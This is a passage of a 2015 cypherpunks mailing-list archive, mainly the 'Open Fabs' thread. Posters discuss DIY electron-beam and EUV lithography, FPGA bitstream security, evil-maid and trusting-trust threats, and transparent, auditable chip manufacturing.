(areal photon emission)? None that I'm aware of. But EUV will take over from electron-beam: The latter is quite slow, and typically has been used mostly for making masks. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5714 bytes Desc: not available URL: From wirelesswarrior at safe-mail.net Wed Jul 29 11:06:41 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Wed, 29 Jul 2015 14:06:41 -0400 Subject: Open Fabs Message-ID: -------- Original Message -------- From: Zenaan Harkness Apparently from: cypherpunks-bounces at cpunks.org To: cypherpunks at cpunks.org Subject: Re: Open Fabs Date: Wed, 29 Jul 2015 09:27:53 +0000 > On 7/29/15, wirelesswarrior at safe-mail.net wrote: > > For CPunks what's needed is a DIY Electron Beam Litho apparatus. Its > > basically an electron microscope in reverse. For relatively simple chips it > > could be more than adequate as its possible eliminates the need and > > complexity, chemistry, etc. for masks and can perform most all process > > functions (doping, implantation, etc.) and attain feature sizes commensurate > > with current foundary tech. AFAIK, its possible to build from used > > e-microscopes though maintaining calibration and linarity is something best > > learned in a working environment at someone else's expense. :) One of the > > main shortcomings of EBL is its low production rate since all features must > > be developed by "writing" them, like an old stylevector display, on the > > substrate. > > Whereas with "photon lithography" (terminology?) a light source covers > an area (of the mask?) which is then lens-focused down to the > appropriate scale (eg 24nm) onto the silicon and etc physical layer? > Firstly is this minimal understanding correct? > > Secondly is there any potential areal electron emission device (as > opposed to point electron emission device) comparable to current litho > tech (areal photon emission)? There was research and patenting in this area beginning in the 60-70s but I not seen any articles showing use. From rsw at jfet.org Wed Jul 29 11:07:14 2015 From: rsw at jfet.org (Riad S. Wahby) Date: Wed, 29 Jul 2015 14:07:14 -0400 Subject: Open Fabs In-Reply-To: <55B9064E.5010903@virtadpt.net> References: <55B9064E.5010903@virtadpt.net> Message-ID: <20150729180714.GA2509@antiproton.jfet.org> The Doctor wrote: > More likely, dump the contents of the EPROM some FPGAs read their gate > matrices out of when they power up. But that just gives away the bitstream describing the FPGA configuration (say, a trusted CPU). Is the CPU's *design* a secret? If not, I don't see why it matters that an evil cleaner might read out the FPGA's configuration. (Obviously, don't store secret keys in there!) If we really are worried about keeping the CPU's design a secret, it's possible with many FPGAs to encrypt the configuration bitstream such that the configuration is decrypted onboard the FPGA at power-on. This is intended to handle the case where I want to sell a product that uses an FPGA without revealing the contents of that FPGA's configuration to my customers or competitors. Of course, this doesn't really provide useful security guarantees against a sophisticated adversary. First, since the FPGA contains or automatically derives the secret key to decrypt this encrypted bitstream, the manufacturer of the FPGA likely also knows the key or how to derive it (as does anyone with sufficient dedication and a well-equipped lab). Second, we have no idea how well this system is designed or implemented, since the bitstream security system is itself a proprietary secret. And third, even if it's competently built, as I pointed out above, the threat model is "customer reads out my proprietary design," which means that, practically speaking, the technological barrier is only there to support a more comprehensive framework of legal recourse in the case that my customer or competitor tries to steal the secret sauce. Probably a reasonable evil cleaner attack against an FPGA-based "trusted" CPU is to overwrite the contents of the configuration ROM with a similar but subtly bugged design. This is more or less isomorphic to "the NSA signs bugged microcode for my Intel CPU." Cue the OTP / epoxy / physical security arms race, I guess. -=rsw From grarpamp at gmail.com Wed Jul 29 11:37:09 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 14:37:09 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: Pasting in more from the truecrypt thread that should have gone in here... Dnia wtorek, 28 lipca 2015 21:34:07 Steve Kinney pisze: > If a market is willing to pay enough to support and grow the > project, it can be done. Are there potential partners and large > scale consumers for "top security through total transparency" to > make an open hardware project viable today? rysiek: Yes. And there are ways to create a market like that, albeit it takes time. > I haven't looked at how the Black Phone folks are doing lately, > but that looks like the kind of product line where open hardware > might find its first viable home. rysiek: Funny you should ask: http://www.theinquirer.net/inquirer/news/2402536/us-department-of-defence-adopts-nsa-proof-blackphone-devices On 07/28/2015 03:40 PM, oshwm wrote: > So is anyone working on building an 'openfab' or is it such a big > task that everyone just backs away in horror? :D doctor: The closest I know to that is Jeri Ellsworth, who's at the point of fabbing her own discrete transistors in a homebrew semiconductor foundry. If she's still working on this project, she's probably a bit closer but I haven't spoken to her about it. From rsw at jfet.org Wed Jul 29 12:25:28 2015 From: rsw at jfet.org (Riad S. Wahby) Date: Wed, 29 Jul 2015 15:25:28 -0400 Subject: Open Fabs In-Reply-To: <55B91C79.8010203@virtadpt.net> References: <55B9064E.5010903@virtadpt.net> <20150729180714.GA2509@antiproton.jfet.org> <55B91C79.8010203@virtadpt.net> Message-ID: <20150729192528.GA3353@antiproton.jfet.org> The Doctor wrote: > I thought the point being made in the conversation was (and correct me > if I'm wrong) that one could dump an arbitrary FPGA's contents to do a > security audit on them. Ah, I see. I thought the focus was on cold boot or evil maid attacks against FPGA-based (thus, nominally trustworthy) CPUs, and how these attacks might compare to similar attacks against a commercial CPU. As you pointed out before, one may as well just grab the configuration out of the ROM itself, and I agree---but my point was that either way, what are we getting except some information that's not really secret? So I think we're in violent agreement, at least to the extent that we're talking about the same thing :) Also: one assumes that cold boot attacks against the contents of RAM are more useful than against the SRAMs that hold the FPGA's configuration, and in that case probably it's little different from the equivalent attack against a commercial CPU (the DRAM is more or less the same whether we're talking about the commercial or the FPGA-based CPU---you're using the same DIMMs either way). On further reflection, I suppose the contents of the block RAMs inside the FPGA (little SRAMs sprinkled through the fabric) might be a prize worth chasing, since those are presumably acting as registers and cache for our CPU. It *might* be possible to do so by cold booting the FPGA with a configuration that dumps the contents of the block RAMs, assuming that those contents aren't cleared by power-on reset or the configuration process itself. To your point above about auditing the configuration actually running on an FPGA: that would be very interesting to prevent against an FPGA manufacturer going the reflections-on-trusting-trust route. Here's one way an evil FPGA manufacturer might proceed: the CAD software that the manufacturer provides with the FPGA detects that you're synthesizing a CPU. Rather than emit a flawed bitstream (which might be detectable just by examining the bitstream itself), perhaps the software would hide in the bitstream some instructions that direct the FPGA's configuration state machine to introduce flaws at config time. (FPGA config bitstreams are big, complicated, and proprietary; so it's not impossible that they contain enough redundancy that one could use stego to hide such commands in the bitstream.) (This approach also helps to get around the fact that the synthesis and fitting process does a randomized search for a configuration that meets your criteria (e.g., speed, size, etc.). In other words: the best time to detect "this guy is trying to build a CPU" is when the software is reading your Verilog, not when it's loading the bitstream into an FPGA, because it's really really hard to decide "this is a CPU" just by examining the bitstream itself.) But I suppose if I were so devious as a manufacturer of FPGAs as to detect a CPU design and introduce subtle bugs as a result, I would probably also do my best to keep you from detecting it, even if you *are* able to read out the config from a running FPGA. It's quite a large haystack for hiding such a little needle... (And regarding cold booting to read out the config SRAMs: I worry even more here than in the case of block RAMs that these have a carefully designed power-on reset scheme in place so that the FPGA fabric comes up in a known state.) -=rsw From jdb10987 at yahoo.com Wed Jul 29 09:40:40 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 29 Jul 2015 16:40:40 +0000 (UTC) Subject: Open Fabs In-Reply-To: References: Message-ID: <2063575076.5180904.1438188040721.JavaMail.yahoo@mail.yahoo.com> ----- Original Message ----- From: Zenaan Harkness On 7/29/15, wirelesswarrior at safe-mail.net wrote: >> For CPunks what's needed is a DIY Electron Beam Litho apparatus. Its >> basically an electron microscope in reverse. For relatively simple chips it >> could be more than adequate as its possible eliminates the need and >> complexity, chemistry, etc. for masks and can perform most all process >> functions (doping, implantation, etc.) and attain feature sizes commensurate >> with current foundary tech. AFAIK, its possible to build from used >> e-microscopes though maintaining calibration and linarity is something best >> learned in a working environment at someone else's expense. :) One of the >> main shortcomings of EBL is its low production  rate since all features must >> be developed by "writing" them, like an old stylevector display, on the >> substrate. >Whereas with "photon lithography" (terminology?) a light source covers >an area (of the mask?) which is then lens-focused down to the >appropriate scale (eg 24nm) onto the silicon and etc physical layer? >Firstly is this minimal understanding correct? That's the way things were about 25 or so years ago.  Wafers with photoresist were exposed with machines using UV, which over the years used ever-decreasing  wavelengths of UV, in equipment:436. 365nm, and 248nm, eventually reaching 193 nanometer UV.  In the 1970's, entire wafer-masks (which covered the entire wafer) were used.  This became impractical as feature-sizes were reduced.  Step-and-repeat devices ("wafer-steppers) https://en.wikipedia.org/wiki/Stepper   then allowed exposure of a much smaller portion of a wafer.  (these eventually used mirrors, rather than lenses, because it is hard to process UV in a solid lens.)    However, because the wavelength of light eventually became a large portion of the size of a chip feature (a line or a space) it was increasingly difficult to 'draw' the picture necessary to expose the resist on the wafer.  Due to many ever-more-heroic technologies, it eventually became possible to use 293 nanometer wavelength to expose features far smaller than the wavelength itself, which would have been considered phenomenal in the 1970's.  These days, EUV ("extreme ultraviolet") has been used for ever more small features.   https://en.wikipedia.org/wiki/Extreme_ultraviolethttps://en.wikipedia.org/wiki/Extreme_ultraviolet_lithography   EUV is strongly absorbed by air, so such exposure is typically done in a vacuum. >Secondly is there any potential areal electron emission device (as >opposed to point electron emission device) comparable to current litho >tech (areal photon emission)? None that I'm aware of.  But EUV will take over from electron-beam:  The latter is quite slow, and typically has been used mostly for making masks. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4955 bytes Desc: not available URL: From admin at pilobilus.net Wed Jul 29 15:06:10 2015 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 29 Jul 2015 18:06:10 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: <55B94E52.2050709@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/29/2015 02:37 PM, grarpamp wrote: > Pasting in more from the truecrypt thread that should have gone > in here... > > > Dnia wtorek, 28 lipca 2015 21:34:07 Steve Kinney pisze: >> If a market is willing to pay enough to support and grow the >> project, it can be done. Are there potential partners and >> large scale consumers for "top security through total >> transparency" to make an open hardware project viable today? > rysiek: Yes. And there are ways to create a market like that, > albeit it takes time. >> I haven't looked at how the Black Phone folks are doing >> lately, but that looks like the kind of product line where >> open hardware might find its first viable home. > rysiek: Funny you should ask: > http://www.theinquirer.net/inquirer/news/2402536/us-department-of- defence-adopts-nsa-proof-blackphone-devices Good > catch! See also: See also: http://www.defenseone.com/technology/2015/03/pentagon-rolls-out-nsa- proof-smartphones/108892/ Must have been something in the air. Now everybody will want something similar - and some won't have the luxury of trusting the NSA, NRO, ETC the same way the DoD can. "Let's talk about the chips in your TAO/ANT Brand scrambler phones..." :o) > On 07/28/2015 03:40 PM, oshwm wrote: >> So is anyone working on building an 'openfab' or is it such a >> big task that everyone just backs away in horror? :D > doctor: The closest I know to that is Jeri Ellsworth, who's at > the point of fabbing her own discrete transistors in a homebrew > semiconductor foundry. If she's still working on this project, > she's probably a bit closer but I haven't spoken to her about > it. I do see problems with scaling DYI chip projects up to commercial production numbers, and down in scale to achieve fast, high capacity performance. That's why I am much more interested in the prospects of a manufacturing process built for radical transparency, using "commercial best practice" technology at conventional production facilities. IMO the same kind of radical transparency should apply to all industrial processes that pose large potential hazards to public health & safety, i.e. nuclear power stations, transgenic agriculture, etc. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVuU5QAAoJEDZ0Gg87KR0Ldi8P/28tQayfNwd2gyAW/BXMBggU fD8MoUa9N+Zx9OooWXXxm+vE00of1gvcn/OSIXDt/8L9hKw26EDKPNXCV/S7fdlb V9hWxJEGVHAgqrSC1zOZrRU+eCpN98rtl4F/ah1uDQHYY/degwvnHtHqTmkZMIsC LuwIhtdDBO+kSoKvNbA/av0F/yCPvg1KwErq+zEb5wL94XW85vFd+Kwgn7uFCIU2 h4wHPJzn4jyfXAJftiwh8F5Sqq1pY2Iyw0quMBxOEK8UMz2ix4ZmuasGONswapby rPRmb/MKTpdY8K5+Qics7OljLJgeT6mdA9m3aT7RNxuj9enzETI1uL/31jmvsWiT 5qnnEuPIueA70KOodidDfyGETNzW6yppTy7HPUVVJtnHQMV2HJpz2e8bK5GOuHW4 78peFv9BFaPtO69FHADTYoUDG8ygqDnxkI4AQxm5pxctr64reA1h1HXNJIGVbkGu lMWPKgj2Nk8Sw7HC6+kEO7so9tMUnCECY/ImBTrLum7DeDhHwsmRBLuQuy67QPpj 9LYIXTkWpD87fV2Uh3z/OGHHicEdPQufkBvi/6FFiwyKvZYy8E9CSK/nQaWLKhSn jX3ksFJlXr3c03Due6tB2Q40vfW0vK350WR5vFIp+k/Bia+wkFUsgufK0D1gNIS4 GzkFkU0vfqtUaEsQseB3 =Fxgx -----END PGP SIGNATURE----- From jdb10987 at yahoo.com Wed Jul 29 12:22:04 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 29 Jul 2015 19:22:04 +0000 (UTC) Subject: Open Fabs In-Reply-To: References: Message-ID: <968844891.5173846.1438197724907.JavaMail.yahoo@mail.yahoo.com> From: "wirelesswarrior at Safe-mail.net" -------- Original Message -------- From: jim bell  ----- Original Message -----From: Zenaan Harkness On 7/29/15, wirelesswarrior at safe-mail.net wrote:  >>That's the way things were about 25 or so years ago.  Wafers with photoresist were exposed with machines using UV, which over the years used ever->>decreasing  wavelengths of UV, in equipment:436. 365nm, and 248nm, eventually reaching 193 nanometer UV.  In the 1970's, entire wafer-masks (which >>covered the entire wafer) were used.  This became impractical as feature-sizes were reduced.  Step-and-repeat devices ("wafer-steppers) >>https://en.wikipedia.org/wiki/Stepper   then allowed exposure of a much smaller portion of a wafer.  (these eventually used mirrors, rather than lenses, >>because it is hard to process UV in a solid lens.)    >>However, because the wavelength of light eventually became a large portion of the size of a chip feature (a line or a space) it was increasingly difficult to >>'draw' the picture necessary to expose the resist on the wafer.  Due to many ever-more-heroic technologies, it eventually became possible to use 193 >>nanometer wavelength to expose features far smaller than the wavelength itself, which would have been considered phenomenal in the 1970's.  >>These days, EUV ("extreme ultraviolet") has been used for ever more small features.   https://en.wikipedia.org/wiki/Extreme_ultraviolet>>https://en.wikipedia.org/wiki/Extreme_ultraviolet_lithography   EUV is strongly absorbed by air, so such exposure is typically done in a vacuum. >Is this using near-field optics? There also has been experimentation with soft x-rays using wiggler-type linear accelerators.>The differences between photons and electrons enables e-microscopes and EBL (which also operates in the vacuum) to avoid the optical-based >limitations. I really don't know about modern EUV lithography.  That's why I cited the Wikipedia article, above.   It has a huge amount of information I haven't been keeping up on.  (I've had excuses...)   It is clearly extremely difficult/expensive to develop, which is in large part why they took so long to go from 193 nm to EUV's 13.5 nm.  Just reading that article is painful.  But they have to do it, because they want to get to feature sizes of 10nm and below.  It takes about 10 'square features' to make a DRAM cell.  A DRAM whose storage array is 1 cm^2 might, in principle, contain 100 billion DRAM cells.                 Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5854 bytes Desc: not available URL: From list at sysfu.com Wed Jul 29 19:48:05 2015 From: list at sysfu.com (Seth) Date: Wed, 29 Jul 2015 19:48:05 -0700 Subject: Best court document you've read in your life Message-ID: Includes interesting info about Target shopping chain pulling surveillance video to identify a Tracphone buyer, surveillance drone usage in support of car-theft ring on Mare Island in the Bay Area, threatening the local Vallejo police department, Christian repent, you name it. And of course the obligatory dipshit move or two by the defendant in the criminal complaint, such as leaving his drivers license under the seat of a stolen car. Starts getting good around page 20. Hat tips to Jacob AppleBaum and @ncweaver (twitter) https://twitter.com/ioerror/status/624249473779257344 http://www1.icsi.berkeley.edu/~nweaver/vallejo.pdf From odinn.cyberguerrilla at riseup.net Wed Jul 29 20:09:49 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Wed, 29 Jul 2015 20:09:49 -0700 Subject: True Crypt is Not Secure In-Reply-To: <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> References: <1437752365-sup-6750@metis.syd1.tesser.org> <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> Message-ID: <55B9957D.8080102@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I have heard word of some 'openfab' project that someone has been working on, I will inquire and will post more details if it actually has led to something. On 07/28/2015 03:40 PM, oshwm wrote: > So is anyone working on building an 'openfab' or is it such a big > task that everyone just backs away in horror? :D > > > On 28 July 2015 22:04:38 BST, grarpamp wrote: >>> TrueCrypt has been audited[0] and come through relatively >>> unscathed; I'd trust it over a Microsoft product I'd need to >>> disassemble to examine any day. > >> You may trust your opensource code but would still need to >> disassemble and audit any critical and closed windows libs and >> system interfaces you compile against, let alone run in / under. >> This is the trouble with closed platforms. You have some luck >> with open unix, but the luck buck currently stops at the iron >> and the hardware is getting worse. And we don't have any open >> fabs on the horizon to solve it. This is BAD. > > > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVuZV8AAoJEGxwq/inSG8CJe4IAIoiXmWUb5dH+4w28x+qySYg aHLUJ66gJtlEudG6B5U9ukXZGBWq2tkz1GZnAtpQAnZyjyJdZmj5k8yVpXV/S08b IG2LzASyuf3hcEjeVMnMARKMM9PYjtVIBwMIKVviTOpK3AxM2buu7ZVaiBBOO0I1 tgL3wqAhtFwyU+R7voxoW1ObLMBXzYzggqEFKXTyY5b2rwAQylmmswIwr+wvKDm1 dHFueGYQg2uOXzsEssRPE6ByZ7h5HLtw0Tdd8k28BIMCQKc4VlctbA0kpcFKZN2p rHojiIiwqnNEgQfAlplIAuCuYtP39fGPnOH6zeNIFPs8Xn3/eDZVdgcsavwoSMk= =ngQq -----END PGP SIGNATURE----- From grarpamp at gmail.com Wed Jul 29 17:24:30 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 20:24:30 -0400 Subject: Obama Orders Exaflop CPUs... Spy And Police You Message-ID: http://motherboard.vice.com/read/obamas-new-executive-order-says-the-us-will-build-an-exascale-supercomputer The initiative will primarily be a partnership between the Department of Energy, Department of Defense, and National Science Foundation, which will be designing supercomputers primarily for use by NASA, *the FBI*, the National Institutes of Health, *the Department of Homeland Security*, and NOAA. Each of those agencies will be allowed to provide input during the early stages of the development of these new computers. Big data... * Relatively new stakeholders, in addition to the traditional role of killing you provided by DoD/DoE. For Science... From grarpamp at gmail.com Wed Jul 29 17:59:13 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 20:59:13 -0400 Subject: Open Fabs In-Reply-To: <55B94E52.2050709@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> Message-ID: On Wed, Jul 29, 2015 at 6:06 PM, Steve Kinney wrote: > I do see problems with scaling DYI chip projects up to commercial > production numbers, and down in scale to achieve fast, high > capacity performance. It's not DIY. It's many similarly thinking Y's coming together to DI. Eventually you'll reach beyond any given initial fledgling "hobby class" goalposts. Nothing unusual or unachievable there. Since it's all been done before, how long to rebuild trustable compute and manufacturing from trustable discretes like relays, punchtape, and hand tools to 100nm? 5y? 10y? > That's why I am much more interested in the > prospects of a manufacturing process built for radical > transparency, using "commercial best practice" technology All part of it. > at conventional production facilities. Except this, unless you're demonstrating a way to convince these untrustable closed entities to open up their entire process and production line for your inspection pursuant to each and every audited run you want to put through it. If you're not, then you can't be certain that what you put in is what you get out. > IMO the same kind of radical transparency should apply to all > industrial processes that pose large potential hazards to public > health & safety, i.e. nuclear power stations, transgenic > agriculture, etc. You should be able to read the as-built blueprints of all of these things online, access all areas of plants for independant inspection, raise enforceable design and safety flags, etc. From grarpamp at gmail.com Wed Jul 29 18:34:49 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 21:34:49 -0400 Subject: Kentucky Man Jailed For Shooting Down Drone... Privacy, Trespass, Creeping, Etc Message-ID: http://tech.slashdot.org/story/15/07/29/142227/kentucky-man-arrested-after-shooting-down-drone "We’re not going to let it go," he said. "Because our rights are being trampled daily," he said. "Not on a local level only - but on a state and federal level." From admin at pilobilus.net Wed Jul 29 18:47:21 2015 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 29 Jul 2015 21:47:21 -0400 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> Message-ID: <55B98229.6090109@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/29/2015 08:59 PM, grarpamp wrote: [ ... ] >> That's why I am much more interested in the prospects of a >> manufacturing process built for radical transparency, using >> "commercial best practice" technology > > All part of it. > >> at conventional production facilities. > > Except this, unless you're demonstrating a way to convince > these untrustable closed entities to open up their entire > process and production line for your inspection pursuant to > each and every audited run you want to put through it. If > you're not, then you can't be certain that what you put in is > what you get out. That's exactly what I'm talking about: Essentially taking over the production process and working alongside facility staff, with particular attention to choke points where validation is both possible and productive. ISO quality programs include provision for onsite participation by clients; it's more a question of money, and picking a facility that can readily accommodate the requirements, than of getting anyone to open up any closed process. This might deprive one of the advantages of "commercial trade secret" techniques belonging to the facility's owners, but that's kind of the whole point of the exercise. Smaller facilities with older equipment would be better prospects than the mega-shops. One should never be certain that one is receiving exactly what was specified, regardless of validaiton. Somewhere, the rising curve of security costs will cross a falling curve of security risks, and that's as good a place as any to draw a line. Mark the other side of the line "here be dragons - maybe." End users can pick up any perceived slack if and as they want to spend the money to do so. >> IMO the same kind of radical transparency should apply to >> all industrial processes that pose large potential hazards to >> public health & safety, i.e. nuclear power stations, >> transgenic agriculture, etc. > > You should be able to read the as-built blueprints of all of > these things online, access all areas of plants for independant > inspection, raise enforceable design and safety flags, etc. Damn straight. I'm especially picky about the inspection records of nuclear power facilities; IMO they should include video of the inspectors at work, especially in hazardous / PITA locations they might be inclined to skip. I recall at least one case where reactor inspection logs were casually falsified for years, very nearly causing a catastrophic core breach due to undetected containment vessel deterioration located "around a corner and out of sight" from casual view. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVuYInAAoJEDZ0Gg87KR0LnlAQANaYgr/vJ0oiIy1c5XHzTLT0 vKtYUxg07dJksSmv9UdGE+fDjLO+w9ojRMm5iGLTWUhfi1FF3nNLaSkR5o1Ho7kH vwLB/UknMxNlsP5Nfe2+JBVOcGh/r4w/QgrmYpksO5NSrc3vpeq3hmJQLq31uwNQ 4S90svYIyPI6r/TcuKJopIirDBAMKlC2FN5mWwUQ1wK5frFQ7QX467t/Nw7x/fIm GKKEHKtXFk3KtgCUWpEw9k0b0FiZR4g22jPhBxEqVatpwPBhUiiqkQ084202jH2V hLgF+Qlpoo0aPbY/8xGfULwtGRenJRv0YP2Wc7GXtQyDRRy7k7p6/YzA4jaO2qyJ 3NATz9p/xWzf5CeurPKmhJ4Kxz08+SrXesJDCOizoNLa0Glv98FLNisC2risrHyL D8N+VjQTHgczxgYXpb+ubbK6W8t4M6WkbEM721xqdgMdGTqa/AS/dMSTzARTQtqH GpvpxqkfWdmiFHpNjMVG+XSiZZMiKXybqwqI4jDCMbcZN9iOHcBRLviMtwkhkRjm M7yoXIRTEAD9OyIbZbg/n7IjYrI3/RXDfjwGm7H7893v+2XmLJOtOeMTw00TuO66 rPSI1zE5/rY1Bx3/F7ZwqY1LlP9RqbCNp0tIylQx+4Lz7tdEM+DzSHoJeE+c5dEm TEIAjPgbol14M/VViP5I =hsKV -----END PGP SIGNATURE----- From softservant at gmail.com Wed Jul 29 22:25:38 2015 From: softservant at gmail.com (Softy) Date: Wed, 29 Jul 2015 22:25:38 -0700 Subject: Open Fabs Message-ID: > It's not DIY. It's many similarly thinking Y's coming together to DI. > Eventually you'll reach beyond any given initial fledgling "hobby > class" goalposts. Nothing unusual or unachievable there. > > ​Honestly, a good model for acquiring capital for a radical idea, one could do worse than to consult SeaSheapard - half dozen plus fleet navy of multiple multi-million dollar ships with expensive operations costs. EarthFirst isn't as capital intense, but good at putting the limited capital into direct action. ​ -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1073 bytes Desc: not available URL: From softservant at gmail.com Wed Jul 29 22:34:25 2015 From: softservant at gmail.com (Softy) Date: Wed, 29 Jul 2015 22:34:25 -0700 Subject: Open Fabs Message-ID: ​​ > > IMO the same kind of radical transparency should apply to all > > industrial processes that pose large potential hazards to public > > health & safety, i.e. nuclear power stations, transgenic > > agriculture, etc. > > > Are you crazy? The terrists would use the information > against the good guys. > > > ​It seems very quickly an OpenFab plant will need to implement the same security as a current conventional plant. This will of necessity include keeping out plebs/civilians/non-plant workers. And there you go again not knowing whose doing what within the plant. Unless you happen to be on the inside ... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1217 bytes Desc: not available URL: From grarpamp at gmail.com Wed Jul 29 19:48:56 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 22:48:56 -0400 Subject: Open Fabs In-Reply-To: <55B98229.6090109@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> Message-ID: On Wed, Jul 29, 2015 at 9:47 PM, Steve Kinney wrote: > That's exactly what I'm talking about: Essentially taking over > the production process and working alongside facility staff, with > particular attention to choke points where validation is both > possible and productive. ISO quality programs include provision > for onsite participation by clients I submit the above is moot... you're taking your chip design in on your USB, happy as a clam to be the one to insert it into their computer, pull it up on their screen, and watch the whole thing play out before your eyes... on down the line till out pops a chip in your hand, yay! But you failed to realize their computer and software probably wasn't made by them, nor has any open to you audit crosscheck been wrapped around it or it's operators and maintainers... on down the line. You can carve a stick with a knife but you can't really build a trusted cpu with an untrusted cpu. If the goal is to build an open trusted fab, you must build an open trusted fab, by and with the hard and different philosophical mofos who refuse to concur unless each step of design, build and operation is plainly validated. Otherwise you're just selling tourist tickets to the theme park. This is old school TCSEC / CC applied to manufacturing. You have cost efficiency in that the knowledge of tool and chip making already exists. You use that savings to offset cost of rebuilding with TCSEC. As opposed to trying to impart trust upon existing systems which is prohibitive. > Somewhere, the rising curve > of security costs will cross a falling curve of security risks, > and that's as good a place as any to draw a line. Trust is not defined by a point on a cost curve. From admin at pilobilus.net Wed Jul 29 20:03:43 2015 From: admin at pilobilus.net (Steve Kinney) Date: Wed, 29 Jul 2015 23:03:43 -0400 Subject: Open Fabs In-Reply-To: <55b986a7.8528370a.405dd.404b@mx.google.com> References: <55B94E52.2050709@pilobilus.net> <55b986a7.8528370a.405dd.404b@mx.google.com> Message-ID: <55B9940F.2040806@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/29/2015 10:08 PM, Juan wrote: > On Wed, 29 Jul 2015 18:06:10 -0400 Steve Kinney > wrote: > >> IMO the same kind of radical transparency should apply to >> all industrial processes that pose large potential hazards to >> public health & safety, i.e. nuclear power stations, >> transgenic agriculture, etc. > > > Are you crazy? The terrists would use the information against > the good guys. Security by obscurity ain't security at all. But of course you must have been joking. :D -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJVuZQLAAoJEDZ0Gg87KR0L3o0P/3/F/PJ8EbG+UtiQ6cJjQnsZ yikqKXFK7uVyPPpXrNnlDfz5wrsh4l4kuK9jJcugHNJd0iI4Bj/JyoYlWpiD8AmQ 63FMDEiy8pteI5DHPHQzwVWT7slVsZhTBjwdak4SYpxGLNNyXT8KCmEuOD8NwcHi X1TUcR02gDh1ZZgGOm62hQcFwO2m+VpZBGcGLizbKY/czR8rV0+3vpoNaSion6S2 ZjcaTG+eWVheWmGXXKbnElPxacupeRX6KXIPi9HZBIrcfwqa+ZGcgVzVHmooJqTh prv6q3YtiYPiNPyP0zCKsImLXjknF8cSQEK4ItzAD+7iL0WnrcZ0kYG+Qa4u6PrO 5ecmhByzKAMFmSaiqtmHpycmktjijpFeRPRTAtBneeWsbADbSzN8KwSlWoSRrAI0 9G9IXRXaztyjFvio5Izy9PIO6y+TacRJPbiYwRtWXpDPvlsMxkkhSL6RaXeUWb/C IQoJrqpqtN1Qz5nt81EoACbj06sn0xYGVNxVi4VN36b4cnl2V+QLVsDBbAawihos cV2g+NOn6ayBACtDmrZLw8XnVZ4O+7sX9bY5Wm1nkMrhqAp+/OWdRmkrU3e0g1GJ aGW/AQ0HLPyaatSPRebntYob7ZemTQ7lLAK+LYYAtkV6eMQPXAt0GgkfdXPP86Q8 oKdE6ej8gFzrHPprlihy =Tc3R -----END PGP SIGNATURE----- From juan.g71 at gmail.com Wed Jul 29 19:08:14 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 29 Jul 2015 23:08:14 -0300 Subject: Open Fabs In-Reply-To: <55B94E52.2050709@pilobilus.net> References: <55B94E52.2050709@pilobilus.net> Message-ID: <55b986a7.8528370a.405dd.404b@mx.google.com> On Wed, 29 Jul 2015 18:06:10 -0400 Steve Kinney wrote: > IMO the same kind of radical transparency should apply to all > industrial processes that pose large potential hazards to public > health & safety, i.e. nuclear power stations, transgenic > agriculture, etc. Are you crazy? The terrists would use the information against the good guys. > > :o) > > From grarpamp at gmail.com Wed Jul 29 20:18:45 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 23:18:45 -0400 Subject: US Gov Orders Internet To Rat Out Its [Innocent] Users In-Reply-To: References: Message-ID: https://firstlook.org/theintercept/2015/07/28/sen-wyden-challenges-provision-require-tech-companies-report-terrorist-activity/ https://firstlook.org/theintercept/2015/07/29/report-dhs-warns-booting-extremists-twitter-might-upset/ From admin at pilobilus.net Wed Jul 29 21:11:06 2015 From: admin at pilobilus.net (Steve Kinney) Date: Thu, 30 Jul 2015 00:11:06 -0400 Subject: Open Fabs In-Reply-To: References: <55B94E52.2050709@pilobilus.net> <55B98229.6090109@pilobilus.net> Message-ID: <55B9A3DA.3040701@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 07/29/2015 10:48 PM, grarpamp wrote: > On Wed, Jul 29, 2015 at 9:47 PM, Steve Kinney > wrote: >> That's exactly what I'm talking about: Essentially taking >> over the production process and working alongside facility >> staff, with particular attention to choke points where >> validation is both possible and productive. ISO quality >> programs include provision for onsite participation by >> clients > > I submit the above is moot... you're taking your chip design in > on your USB, happy as a clam to be the one to insert it into 